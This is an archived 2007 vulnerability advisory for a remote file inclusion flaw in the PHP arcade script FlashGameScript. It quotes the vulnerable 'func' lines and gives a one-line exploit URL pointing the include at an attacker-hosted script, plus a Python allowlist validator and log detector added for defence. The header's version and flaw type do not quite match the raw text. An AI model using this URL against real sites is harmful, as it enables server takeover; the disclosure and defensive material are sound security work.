Vendor: FlashGameScript
By: JuMp-Er
CVSS: 7.5 (HIGH)
Type: Remote Command Execution
CWE: 78
Product Name: FlashGameScript
Affected Version From: 1.5.2004
Affected Version To: 1.5.2004
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

FlashGameScript Remote Command Execution Vulnerability

The vulnerability exists in the index.php file of the FlashGameScript application, where the 'func' GET parameter is read directly from $_GET without any validation. It allows an attacker to execute arbitrary commands by manipulating that parameter. This can be exploited by sending a malicious link whose 'func' parameter points to an attacker-controlled script.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input, particularly any parameters used to execute commands or include files.
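As an added example (not part of the original advisory or of the FlashGameScript code), the Python below shows the allowlist validation the mitigation calls for, applied to the 'func' parameter, and runs the same check over constructed access-log lines to flag requests that carry a URL in 'func' as in the advisory. The allowed plugin names, the log lines and the function names are assumptions.

```python
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# Assumed allowlist of plugin names; the real FlashGameScript plugin set is
# not on the page, so these are placeholders.
ALLOWED_FUNCS = {"games", "members", "top", "search"}
SAFE_NAME = re.compile(r"^[a-z0-9_]{1,32}$")


def validate_func(raw: Optional[str]) -> Optional[str]:
    """Return the plugin name only if it is a plain identifier on the allowlist.

    A URL, a path separator, a dot or anything else that could point an
    include at a remote or unexpected file never matches SAFE_NAME.
    """
    if raw is None or not SAFE_NAME.match(raw):
        return None
    return raw if raw in ALLOWED_FUNCS else None


def looks_like_remote_include(value: str) -> bool:
    """Detection heuristic for the advisory's pattern: func carries a URL or path."""
    v = value.strip().lower()
    return "://" in v or v.startswith(("/", "\\")) or ".." in v


# Constructed Apache-style access-log lines for this example; not real traffic.
LOG_LINES = [
    '203.0.113.5 - - [21/Feb/2007:10:00:01 +0000] "GET /index.php?func=games HTTP/1.1" 200 512',
    '203.0.113.9 - - [21/Feb/2007:10:00:02 +0000] '
    '"GET /index.php?func=http://attacker.example/evil_script? HTTP/1.1" 200 88',
    '203.0.113.7 - - [21/Feb/2007:10:00:03 +0000] "GET /index.php?func=unknownplugin HTTP/1.1" 404 0',
]
REQUEST_TARGET = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_remote_include_requests(lines: List[str]) -> List[str]:
    """Return the offending func values from log lines whose func fails
    validation and carries a URL or path, i.e. attempts at the include above."""
    hits = []
    for line in lines:
        m = REQUEST_TARGET.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for func in parse_qs(query, keep_blank_values=True).get("func", []):
            if validate_func(func) is None and looks_like_remote_include(func):
                hits.append(func)
    return hits
```

An unknown but well-formed name (the third log line) is rejected by validate_func yet not reported as an include attempt, so the detector only surfaces the URL-bearing requests.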

Exploit-DB raw data:

         ___ ___                                        
_____   /   |   \            ___________   ______  _  __
\__  \ /    ~    \  ______ _/ ___\_  __ \_/ __ \ \/ \/ /
 / __ \\    Y    / /_____/ \  \___|  | \/\  ___/\     / 
(____  /\___|_  /           \___  >__|    \___  >\/\_/  
     \/       \/                \/            \/        


--------------------------------------------------------
Author          : JuMp-Er
Date            : Feb 21st, 2007
Level           : Dangerous
Contact         : aH-crew[at]hotmail[dot]com
--------------------------------------------------------


Software description
--------------------------------------------------------
App             : FlashGameScript
Version         : 1.5.4
URL             : http://www.flashgamescript.com/
Price           : $60
Description     :
FlashGameScript: Flash Game Script is the latest arcade website script created by developers at ghoney.com and will be marketed by folks at FlashGameScript.com.
Our game site script is created to maximize arcade site owner's profit with additional plug-ins for alternative income opportunities.
-------------------------------------------------------


Vulnerability (index.php):
---------------
line 27: $absolutepath = $cfg[absolutepath];
line 28: $func = $_GET[func];
line 29: $pluginpath = $instdir."admin/plugins/";
---------------
Exploit:

http://www.somesite.com/index.php?func=http://attacker.com/evil_script?

---------------

Greetz to all members of active. Hacking Crew

# milw0rm.com [2007-02-22]